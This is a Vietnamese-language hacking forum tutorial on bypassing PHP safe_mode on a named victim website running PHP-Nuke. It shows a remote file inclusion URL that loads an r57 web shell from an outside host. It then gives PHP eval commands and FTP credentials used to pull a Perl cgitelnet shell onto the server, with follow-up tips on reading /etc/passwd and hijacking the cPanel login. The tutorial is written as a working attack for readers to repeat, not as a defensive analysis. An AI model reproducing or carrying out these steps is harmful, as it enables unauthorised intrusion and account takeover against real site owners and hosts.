Phương Pháp ByPass Safe-Mode(Local Hack - web)

Phương Pháp ByPass Safe-Mode

Lần trước có làm 1 cái video về cái này, nhưng nó hơi nặng , thôi hôm nay vít thành 1 Tút cho anh em dễ đọc hem

+Site victim của tôi là : http://tusivachungsinh.net/

Nhìn vào ta sẽ thấy nó xài Php-Nuke, mà thằng này thì dính đầy lỗi Critical . Ta check 1 lỗi phổ biến của nó để include shell xem
Lỗi này đã đc public khá lâu rồi,nhưng nhiều thằng ko chịu Update thì ta vẫn mần ăn đc hehe
vô milw0rm : http://milw0rm.com/exploits/1866 ( Bug PHP-Nuke <= All version - Remote File Include Vulnerabilities )
Qua lỗi này tôi get đc 1 con shell lên Host qua đường Link

Trích:
hxxp://tusivachungsinh.nt/modules/Forums/admin/admin_avatar.php?phpbb_root_path=hxxp://sheva7ac.googlepages.com/r57shell.txt?

Okies !

Đây là thông tin mà con r57 đem lại

Trích:
Linux hk2.vn-sg.com 2.4.21-40.ELsmp #1 SMP Wed Mar 15 14:44:44 EST 2006 i686 -
Apache/1.3.37 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8
uid=32135 ( tusiva ) gid=32136 ( tusiva )
/home/tusiva/public_html/modules/Forums/admin/

Và thêm nữa là thằng này nó bật Safe-Mode, dis khá nhiều các hàm quan trọng

Trích:
safe_mode: ON
Disable functions : show_source,dl,exec,shell_exec,system,popen,pclose ,proc_open,proc_close,passthru,virtual,leak,chgrp, ini_alter,ini_restore

Command lệnh của con shell vì thế ko hiện đc luôn

Nhưng nhìn kĩ lại ta thấy uid=tusiva , vậy thì mặc mẹ nó ta có quyền owner của site này roài

Ta đã biết Safe-Mode bật và disable hết các hàm PHP chạy shell của ta, nhưng với các Script khác thì nó vô dụng

Vì thế tôi sẽ get 1 con shell dùng perl script lên server này , con mà anh em hay dùng là cgitelnet.pl (ngoài ra nghe nói còn có con shell ".cgi" nữa , chắc dùng vào đây cũng đc anh em ai có thì share nhé) ý tưởng là như vậy

+Đầu tiên tạo 1 thư mục riêng để làm việc cho sướng, mặc dù Safemode On nhưng các hàm bình thường của PHP vẫn chạy đc như thường (nếu nó dis hết thì có mà bán Host cho ma nó mua )

Trên con r57 ta gõ vào ô Eval PHP code :

Trích:
mkdir("./new", 0755);

ấn Excute , sau đó quay trở lại ta đã thấy trong thư mục /home/tusiva/public_html/modules/Forums/admin/ đã xuất hiện thêm 1 thư mục con "new" nữa với chmod là 755 roài (thư mục admin chmod thế nào cũng ko quan trọng vì mình đã có quyền owner của nó rồi)
Chuyển đến thư mục /home/tusiva/public_html/modules/Forums/admin/new để làm việc , Oke !

Tiếp theo là công đoạn Get con cgitelnet.pl lên Host, vào phần "Download files from remote ftp-server" trên con r57 ta điền vào thông tin của Host FTP có chứa con cgitelnet của ta

Trích:
FTP-server: netfast.org
Login: micimacko
Password: 123456
File on ftp: /wwwroot/cgitelnet.pl
Local file: /home/tusiva/public_html/modules/Forums/admin/new
Transfer mode: ASCII


rồi ấn Download để Transfer nó về Host

Quay lại thư mục new ta thấy có con cgitelnet.pl rồi , nó đang mặc định chmod là 644
Ta phải chmod lại cho nó thành 755, chạy PHPcode như sau:

Trích:
chmod("./cgitelnet.pl",0755);

Okies , đã xong !

Giờ ta vào Link hxxp://tusivachungsinh.nt/modules/Forums/admin/new/cgitelnet.pl đã thấy màn hình đen đen bí hiểm của con cgitelnet hehe, như vậy là ta đã có 1 command shell trên sv với uid=tusiva , bất chấp sv đang bật Safe-Mode

++Lưu ý: con cgitelnet.pl chỉ chạy đc với các đk sau:
-Get về Host với dạng ASCII
-chmod 755, thư mục chứa nó cũng phải có chmod 755 (thường ng ta Get về cgi-bin, nhưng thực ra ở đâu có 755 là đc)
-có 2 cái quan trọng nhất nữa là : uid=owner & sv hỗ trợ Perl


++Với con cgitelnet này có thể change File .contactemail để forgot pass lấy cPanel hay là cat /etc/passwd để xem File passwd

End!
Chúc thành công

Down Load CGITelnet :http://www.rohitab.com/download.html#CGITelnet


From HCE